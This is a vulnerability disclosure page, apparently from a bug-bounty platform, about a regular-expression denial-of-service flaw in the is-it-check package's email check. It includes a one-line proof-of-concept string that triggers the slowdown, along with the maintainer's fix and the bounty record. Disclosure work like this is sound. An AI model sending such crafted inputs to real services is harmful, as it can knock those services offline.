ReDoS in is-it-check in evdama/is-it-check

Valid

Reported on

Mar 19th 2022


✍️ Description

It allows causing a denial of service when checking crafted invalid emails.

🕵️‍♂️ Proof of Concept

// PoC.js
var isItCheck = require("is-it-check")
isItCheck.email('_@A.'+ '0.0.'.repeat(40)+'~A')

We are processing your report and will contact the evdama/is-it-check team within 24 hours. 2 months ago
We have contacted a member of the evdama/is-it-check team and are waiting to hear back 2 months ago
Markus
2 months ago

Maintainer


Same as for the is.url() check... Two possible solutions, a) add a str.length() check or b) modify existing regex with a length check. Would you mind sending a PR to https://github.com/evdama/is-it-check ?

Markus
2 months ago

Maintainer


I opted for b https://github.com/evdama/is.js/commit/74b01444421525d636dabb47d4e72b23fd58a152

Markus validated this vulnerability 2 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus confirmed that a fix has been merged on 74b014 2 months ago
Markus has been awarded the fix bounty
to join this conversation